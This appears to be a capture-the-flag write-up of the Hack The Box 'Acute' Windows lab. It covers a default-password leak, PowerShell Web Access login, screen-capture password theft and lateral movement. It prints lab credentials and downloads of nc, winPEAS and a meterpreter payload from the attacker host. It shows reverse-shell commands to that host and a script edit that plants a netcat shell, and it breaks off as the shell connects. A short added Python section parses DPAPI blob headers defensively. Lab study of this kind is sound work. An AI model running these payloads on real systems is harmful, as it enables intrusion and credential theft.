Acute-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: website information analysis (collecting staff names for user IDs), information disclosure in a staff onboarding handbook (default password leak), generating a wordlist with cewl, analysing a document with exiftool, getting a reverse shell with nc, spotting other users logged on to the host, screenshot monitoring with msf, creating a user session from the PS command line to read the flag, PS script analysis, dumping the SAM as local administrator and cracking it, password reuse, editing a bat script.

Reference: https://siunam321.github.io/ctf/hackthebox/Acute/

Reference: https://0xdf.gitlab.io/2022/07/16/htb-acute.html

0x01 Getting user access

1. Official description of the box

Acute is a hard Windows machine that starts with a website on port 443. The site's certificate shows the domain name atsserver.acute.local. Looking around the site, several employees are mentioned, and with that information a list of probable users on the remote machine can be built. Enumerating the site reveals a form with the procedure for new employees of the company. The form shows the default password that all accounts are initially set up with. It also shows a link to a Windows PowerShell Web Access (PSWA) session. Combining all the information available from enumeration, an attacker is able to get into a PowerShell session as the user edavies on Acute-PC01. It is then found that edavies is also logged in with an interactive session. By monitoring edavies' actions, the plaintext password of the user imonks on ATSSERVER can be retrieved. User imonks runs under Just Enough Administration (JEA) on ATSSERVER, but even with the limited command set an attacker is able to modify a script on ATSSERVER so that edavies becomes a local administrator on Acute-PC01. Now that edavies is a local administrator, HKLM\sam and HKLM\system can be retrieved from the system to extract the password hashes of all users. The resulting Administrator hash is crackable, and the plaintext password is reused for awallace on ATSSERVER. User awallace is able to create BAT scripts in a directory that the user Lois executes. Lois has permission to add imonks to the site_admin group, which in turn has access to the Domain Admins group. So after adding imonks to site_admin, he can add himself to Domain Admins and obtain administrative privileges.

2. Get the target IP address: 10.10.11.145

3. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.145 -oG allports -Pn
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 18:54 CST
Nmap scan report for 10.10.11.145
Host is up (1.9s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 34.02 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p443 -sC -sV 10.10.11.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 18:54 CST
Nmap scan report for 10.10.11.145
Host is up (0.31s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-04-16T02:53:29+00:00; -8h03m11s from scanner time.
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -8h03m11s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.37 seconds

4. Add a local hosts entry for the domain name found in the port scan

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.145 atsserver.acute.local acute.local" | sudo tee -a /etc/hosts
10.10.11.145 atsserver.acute.local acute.local

5. Browse the website

https://10.10.11.145/
https://acute.local/

https://atsserver.acute.local/

6. Reading through the site, a docx document was found, and the About page also introduces several staff members by name

https://atsserver.acute.local/about.html

Who we work with

Acute Health work with healthcare providers, councils and NHS units in the UK, training over 10,000 nurses, managers and healthcare workers every year. Some of our more established team members have been included for multiple awards, these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins. Each of whom have come away with special accolades from the Healthcare community.

7. Analyse the contents of the docx

https://atsserver.acute.local/New_Starter_CheckList_v7.docx

The document is clearly an onboarding checklist for new starters.

The staff induction page for this university can be found at: https://atsserver.acute.local/Staff
The staff induction portal can be found here: https://atsserver.acute.local/Staff/Induction

Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this.

This paragraph of the document leaks the default account password: Password1!

8. Combining the information so far, we have a list of likely accounts and a default password:

Aileen Wallace
Charlotte Hall
Evan Davies
Ieuan Monks
Joshua Morgan
Lois Hopkins

9. Some information is still missing, so keep reading the document

Arrange initial probation meeting between Probationer, Head of Department and Probation Adviser.

Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage.

The probation plan should be completed within a month of the start date and should include a requirement to register with LETs re: rate to gain within 3 months of starting. Fellowship of the Higher Education Academy (FHEA).

https://atsserver.acute.local/Acute_Staff_Access

https://atsserver.acute.local/Acute_Staff_Access/en-US/logon.aspx?ReturnUrl=%2fAcute_Staff_Access

10. First use the tool below to generate a wordlist of names from the About page.

┌──(kali㉿offsec)-[~/Desktop]
└─$ cewl https://atsserver.acute.local/about.html -w userlist.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿offsec)-[~/Desktop]
└─$ file userlist.txt
userlist.txt: ASCII text

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat userlist.txt
and
Training
training
for
the
Health
healthcare
Acute
courses
Face
Care
are
File
directory
not
found
.....

11. Analyse the document with exiftool

┌──(kali㉿offsec)-[~/Downloads]
└─$ exiftool ./New_Starter_CheckList_v7.docx
ExifTool Version Number : 12.70
File Name : New_Starter_CheckList_v7.docx
Directory : .
File Size : 35 kB
File Modification Date/Time : 2024:04:17 04:49:43+08:00
File Access Date/Time : 2024:04:17 04:50:11+08:00
File Inode Change Date/Time : 2024:04:17 04:49:58+08:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000

12. Now enumerate the candidate usernames with Burp

13. This turned up a working set of login credentials

Acute-PC01

EDavies

Password1!

14. After logging in, there is a PowerShell console where commands can be entered

https://atsserver.acute.local/Acute_Staff_Access/en-US/console.aspx

15. Test whether the target can reach my host

PS C:\Users\edavies\Documents> 

ping 10.10.14.38 -w 4

Pinging 10.10.14.38 with 32 bytes of data:

Reply from 10.10.14.38: bytes=32 time=258ms TTL=62

Reply from 10.10.14.38: bytes=32 time=255ms TTL=62

Reply from 10.10.14.38: bytes=32 time=257ms TTL=62

Reply from 10.10.14.38: bytes=32 time=255ms TTL=62

Ping statistics for 10.10.14.38:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 255ms, Maximum = 258ms, Average = 256ms

PS C:\Users\edavies\Documents>

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo tcpdump -i tun0 icmp
[sudo] kali 的密码:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:49:34.068118 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 1, length 40
05:49:34.068188 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 1, length 40
05:49:34.975338 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 2, length 40
05:49:34.975377 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 2, length 40
05:49:35.876647 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 3, length 40
05:49:35.876686 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 3, length 40
05:49:36.789916 IP atsserver.acute.local > 10.10.14.38: ICMP echo request, id 1000, seq 4, length 40
05:49:36.789965 IP 10.10.14.38 > atsserver.acute.local: ICMP echo reply, id 1000, seq 4, length 40

16. Outbound connectivity works too, so build a reverse shell. Several PowerShell reverse shells were tried here and all of them errored out, so let's look further

17. Upload nc and use it for the reverse shell

PS C:\Users\edavies\Documents> 
ls
PS C:\Users\edavies\Documents>
iwr -uri http://10.10.14.38/nc.exe -o C:\Users\edavies\Documents\nc.exe
PS C:\Users\edavies\Documents>
ls
Directory: C:\Users\edavies\Documents

Mode LastWriteTime Length Name

---- ------------- ------ ----

-a---- 2024/4/16 15:01 68608 nc.exe
PS C:\Users\edavies\Documents>

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.145 - - [17/Apr/2024 05:56:29] "GET /nc.exe HTTP/1.1" 200 -

./nc.exe -e powershell 10.10.14.38 443

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.145] 49835
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\edavies\Documents> whoami
whoami
acute\edavies
PS C:\Users\edavies\Documents>

18. Next comes the usual information enumeration

PS C:\Users\edavies\Documents> net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Natasha WDAGUtilityAccount
The command completed with one or more errors.

PS C:\Users\edavies\Documents> ls C:/Users
ls C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 21/12/2021 13:01 administrator.ACUTE
d----- 22/12/2021 01:26 edavies
d----- 21/12/2021 22:50 jmorgan
d----- 19/11/2021 09:29 Natasha
d-r--- 18/11/2020 23:43 Public


PS C:\Users\edavies\Documents>


PS C:\Users\edavies\Documents> net user edavies
net user edavies
The user name could not be found.

More help is available by typing NET HELPMSG 2221.

PS C:\Users\edavies\Documents> net user jmorgan
net user jmorgan
The user name could not be found.

More help is available by typing NET HELPMSG 2221.

PS C:\Users\edavies\Documents> net user Natasha
net user Natasha
User name Natasha
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 21/12/2021 10:23:01
Password expires Never
Password changeable 22/12/2021 10:23:01
Password required No
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 21/12/2021 13:39:13

Logon hours allowed All

Local Group Memberships
Global Group memberships *None
The command completed successfully.

PS C:\Users\edavies\Documents>

From this, it looks like we may need to move laterally to the Natasha user

PS C:\Users\edavies\Documents> cd C:/
cd C:/
PS C:\> ls
ls


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 07/12/2019 09:14 PerfLogs
d-r--- 06/12/2021 11:06 Program Files
d-r--- 07/12/2021 12:43 Program Files (x86)
d-r--- 21/12/2021 22:50 Users
d----- 31/01/2022 00:29 Utils
d----- 16/12/2021 01:23 Windows

PS C:\> cd Utils
cd Utils
PS C:\Utils> ls
ls
PS C:\Utils> ls -la
ls -la
Get-ChildItem : A parameter cannot be found that matches parameter name 'la'.
At line:1 char:4
+ ls -la
+ ~~~
+ CategoryInfo : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException
+ FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Utils> dir -force
dir -force

Directory: C:\Utils


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 21/12/2021 18:41 148 desktop.ini

PS C:\Utils> cat desktop.ini
cat desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender
PS C:\Utils>

From this hint, files in this directory won't be killed by the antivirus

PS C:\Utils> net time /domain
net time /domain
The service has not been started.

More help is available by typing NET HELPMSG 2184.

PS C:\Utils> systeminfo
systeminfo
ERROR: Access denied
PS C:\Utils>

It seems the current user's privileges are quite low

PS C:\Utils> netstat -ano
netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 884
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 616
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 2004
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 632
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 560
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 436
TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 632
TCP 0.0.0.0:49693 0.0.0.0:0 LISTENING 620
TCP 172.16.22.2:139 0.0.0.0:0 LISTENING 4
TCP 172.16.22.2:5985 172.16.22.1:63119 ESTABLISHED 4
TCP 172.16.22.2:5985 172.16.22.1:63160 ESTABLISHED 4
TCP 172.16.22.2:60223 10.10.14.38:443 ESTABLISHED 2768
TCP 172.16.22.2:60376 172.16.22.1:5985 TIME_WAIT 0
TCP [::]:135 [::]:0 LISTENING 884
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 2004
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 632
TCP [::]:49665 [::]:0 LISTENING 560
TCP [::]:49666 [::]:0 LISTENING 672
TCP [::]:49668 [::]:0 LISTENING 436
TCP [::]:49670 [::]:0 LISTENING 632
TCP [::]:49693 [::]:0 LISTENING 620
UDP 0.0.0.0:123 *:* 956
UDP 0.0.0.0:500 *:* 436
UDP 0.0.0.0:4500 *:* 436
UDP 0.0.0.0:5050 *:* 616
UDP 0.0.0.0:5353 *:* 1132
UDP 0.0.0.0:5353 *:* 896
UDP 0.0.0.0:5353 *:* 896
UDP 0.0.0.0:5355 *:* 1132
UDP 0.0.0.0:50837 *:* 1132
UDP 127.0.0.1:1900 *:* 4980
UDP 127.0.0.1:52794 *:* 632
UDP 127.0.0.1:52863 *:* 436
UDP 127.0.0.1:57074 *:* 1456
UDP 127.0.0.1:58361 *:* 4980
UDP 127.0.0.1:62516 *:* 1132
UDP 172.16.22.2:137 *:* 4
UDP 172.16.22.2:138 *:* 4
UDP 172.16.22.2:1900 *:* 4980
UDP 172.16.22.2:58360 *:* 4980
UDP [::]:123 *:* 956
UDP [::]:500 *:* 436
UDP [::]:4500 *:* 436
UDP [::]:5353 *:* 896
UDP [::]:5353 *:* 1132
UDP [::]:5355 *:* 1132
UDP [::]:50837 *:* 1132
UDP [::1]:1900 *:* 4980
UDP [::1]:58359 *:* 4980
UDP [fe80::9513:4361:23ec:64fd%14]:1900 *:* 4980
UDP [fe80::9513:4361:23ec:64fd%14]:58358 *:* 4980
PS C:\Utils>

Normally at this point, if this were Linux, I would run pspy to monitor every user's processes and see what turns up.

winPEASx64.exe

iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe

PS C:\Utils> iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe
iwr -uri http://10.10.14.38/winPEASx64.exe -o C:\Utils\winPEASx64.exe
PS C:\Utils>

PS C:\Utils> ./winPEASx64.exe
./winPEASx64.exe

╔══════════╣ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console edavies ACUTE Active

This shows that the user edavies currently has an active logon session (winPEAS lists it under RDP Sessions)

C:\Users\edavies\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\2.0.0.0\passwords.txt

19. That turned out to be a password list that nearly froze my UI. Since someone else is logged on, let's use MSF to monitor them; this follows the walkthrough reports

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=53 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200774 bytes
Final size of exe file: 207360 bytes
Saved as: shell.exe

iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe

PS C:\Utils> iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe
iwr -uri http://10.10.14.38/shell.exe -o C:\Utils\shell.exe
PS C:\Utils> ./shell.exe
./shell.exe
PS C:\Utils>


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.145 - - [17/Apr/2024 06:39:41] "GET /shell.exe HTTP/1.1" 200 -


┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.38
LHOST => 10.10.14.38
msf6 exploit(multi/handler) > set LPORT 53
LPORT => 53
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:53
[*] Sending stage (200774 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.14.38:53 -> 10.10.11.145:49865) at 2024-04-17 06:40:16 +0800

20. Start taking screenshots

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/manage/migrate
msf6 post(windows/manage/migrate) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/migrate) > run

[*] Running module against ACUTE-PC01
[*] Current server process: shell.exe (5392)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:176:in `execute'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:111:in `create_temp_proc'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:64:in `run'
[*] Post module execution completed
msf6 post(windows/manage/migrate) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/CYEgRIyy.jpeg
meterpreter >

21. Keep taking screenshots to monitor the session; a password shows up in one of them

meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/LISdMsyZ.jpeg
meterpreter > screenshot
Screenshot saved to: /home/kali/Desktop/qoiqfcTA.jpeg
meterpreter >

enter-pssession -computername atsserver
enter-pssession -computername atsserver
$passwd = ConvertTo-SecureString "w3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks",$passwd)
Enter-PSSession -ComputerName ATSSERVER -Credential $cred
Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

22. Rather than starting an interactive session with the domain controller as the domain user imonks, we can run PowerShell commands on the domain controller as imonks with Invoke-Command:

PS C:\Utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
PS C:\Utils> Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
acute\imonks
PS C:\Utils>

23. That is enough to read user.txt:

Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

PS C:\Utils> Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\users\imonks\desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
41ac4e3c46c2ce5c32eaa077827a887f
PS C:\Utils>

0x02 Getting system access

24. Besides user.txt, there is another file on imonks' desktop:

PS C:\Utils> Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ls ..\desktop } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred


Directory: C:\Users\imonks\desktop


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 16/04/2024 13:33 34 user.txt ATSSERVER
-a---- 11/01/2022 18:04 602 wm.ps1 ATSSERVER


PS C:\Utils>

PS C:\Utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'

$passwd = $securepasswd | ConvertTo-SecureString

$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)

Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

PS C:\Utils>


PS C:\Utils> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
The command completed successfully.

PS C:\Utils>
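
The $securepasswd string in wm.ps1 is the output of ConvertFrom-SecureString, which is a DPAPI (CryptProtectData) blob. Its header is plaintext and names the master key it was encrypted under, and that master key belongs to the account that created the blob (imonks on ATSSERVER), so any code running as imonks, including an edited wm.ps1, can turn it back into jmorgan's password. The parser below is an added example, not code from the writeup or the box: it reads only the header of the blob copied from the page (nothing is decrypted) and scans a script for embedded blobs, which is how a defender can triage scripts on shares for stored credentials and tell which user's DPAPI key protects them.

```python
import re
import struct
import uuid

# Every DPAPI blob starts with version 1 followed by the provider GUID
# DF9D8CD0-1501-11D1-8C7A-00C04FC297EB in little-endian byte order.
DPAPI_HEADER_HEX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# wincrypt.h CALG_* ids that show up in DPAPI blob headers.
CALG_NAMES = {
    0x6603: "CALG_3DES",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800E: "CALG_SHA_512",
}

# The wm.ps1 script from imonks' desktop, copied from the page as realistic input
# for the scanner; the blob is the page's own, and it stays encrypted.
WM_PS1 = r"""
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
"""


def find_dpapi_blobs(script_text: str) -> list:
    """Return every hex string in a script that begins with the DPAPI blob header."""
    return re.findall(DPAPI_HEADER_HEX + r"[0-9a-fA-F]+", script_text)


def parse_dpapi_blob(hex_blob: str) -> dict:
    """Decode the plaintext header of a CryptProtectData blob; the payload is not decrypted."""
    data = bytes.fromhex(hex_blob)
    pos = 0

    def u32() -> int:
        nonlocal pos
        (value,) = struct.unpack_from("<I", data, pos)
        pos += 4
        return value

    def take(n: int) -> bytes:
        nonlocal pos
        chunk = data[pos:pos + n]
        if len(chunk) != n:
            raise ValueError("truncated DPAPI blob")
        pos += n
        return chunk

    version = u32()
    provider_guid = uuid.UUID(bytes_le=take(16))
    _master_key_version = u32()
    # GUID of the master key file (under the creator's %APPDATA%\Microsoft\Protect\<SID>\)
    # that is needed to unwrap this blob: it ties the secret to that user on that host.
    master_key_guid = uuid.UUID(bytes_le=take(16))
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    crypt_alg = u32()
    crypt_key_bits = u32()
    salt = take(u32())
    _strong_struct = take(u32())  # non-empty only for blobs created with a UI prompt
    hash_alg = u32()
    _hash_bits = u32()
    _hmac_key = take(u32())
    ciphertext = take(u32())
    signature = take(u32())
    if pos != len(data):
        raise ValueError("trailing bytes after DPAPI blob")
    return {
        "version": version,
        "provider_guid": str(provider_guid),
        "master_key_guid": str(master_key_guid),
        "flags": flags,
        "description": description,
        "cipher": CALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "cipher_key_bits": crypt_key_bits,
        "hash": CALG_NAMES.get(hash_alg, hex(hash_alg)),
        "salt_len": len(salt),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def triage_script(script_text: str) -> list:
    """Find embedded DPAPI blobs in a script and report which master key each depends on."""
    return [parse_dpapi_blob(blob) for blob in find_dpapi_blobs(script_text)]


if __name__ == "__main__":
    for info in triage_script(WM_PS1):
        print(f"DPAPI blob bound to master key {info['master_key_guid']}: "
              f"{info['cipher']}/{info['hash']}, {info['ciphertext_len']} bytes of ciphertext")
```

A blob whose master key GUID matches a file in a service or staff account's Protect directory is exactly the stored credential that makes a writable script such as wm.ps1 dangerous.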

25. Modify the script. I have access to Get-Content (cat) and Set-Content (sc), so I can create a new script fairly easily. I could have it call r.exe again (since it executes on the same box I am already on), but I don't want to leave the PowerShell session to start a new listener. I'll upload nc64.exe to C:\utils and have the script call it:

PS C:\Utils> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.14.38 4444') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc.exe -e cmd 10.10.14.38 4444') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
PS C:\Utils> Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {C:\utils\nc.exe -e cmd 10.10.14.38 4444} -ComputerName Acute-PC01 -Credential $creds

PS C:\Utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
The term 'C:\utils\nc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
+ CategoryInfo : ObjectNotFound: (C:\utils\nc.exe:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
+ PSComputerName : ATSSERVER

PS C:\Utils> ls
ls


Directory: C:\Utils


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/04/2024 15:17 770279 PowerView.ps1
-a---- 16/04/2024 15:49 207360 shell.exe
-a---- 16/04/2024 15:28 2387456 winPEASx64.exe


PS C:\Utils>

26. So upload it here

PS C:\Utils> iwr -uri http://10.10.14.38/nc.exe -o C:\Utils\nc.exe
iwr -uri http://10.10.14.38/nc.exe -o C:\Utils\nc.exe
PS C:\Utils> Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.145] 49842
Microsoft Windows [Version 10.0.19044.1466]
